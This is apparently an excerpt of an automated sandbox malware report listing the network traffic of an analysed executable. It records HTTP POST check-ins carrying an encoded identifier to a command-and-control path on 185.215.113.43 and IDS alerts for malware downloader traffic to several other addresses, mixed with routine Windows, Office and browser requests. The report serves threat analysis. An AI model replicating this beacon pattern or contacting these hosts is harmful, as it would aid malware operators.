                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                      Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                      Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
                      Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                      Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49706 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49785 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49912 -> 185.215.113.16:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50009 -> 45.112.123.227:443
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE5CC60 PR_Recv,2_2_6CE5CC60
                      Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120100v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ybAhMg3ktFn4l3f&MD=haNnP8Ll HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /config/v1/Edge/117.0.2045.47?clientId=-2063246587742936609&agents=Edge%2CEdgeConfig%2CEdgeServices%2CEdgeFirstRun%2CEdgeFirstRunConfig%2CEdgeDomainActions&osname=win&client=edge&channel=stable&scpfull=0&scpguard=0&scpfre=0&scpver=0&osarch=x86_64&osver=10.0.19045&wu=1&devicefamily=desktop&uma=0&sessionid=5&mngd=0&installdate=1696491615&edu=0&bphint=2&soobedate=1696491610&fg=1 HTTP/1.1Host: config.edge.skype.comConnection: keep-aliveIf-None-Match: "xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="Accept-Encoding: gzipSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                      Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733299600&P2=404&P3=2&P4=F7wIzN8JKSqLYp%2bfkaBp%2fSSTc%2fD4EACUUd8Vkr8uh9nF3MTtYcsiuIPmQxYLWdRs16OSUyHvCXYrwmhNWV0aMw%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: w11S6kOdtJQkcH7fqyi2eUSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
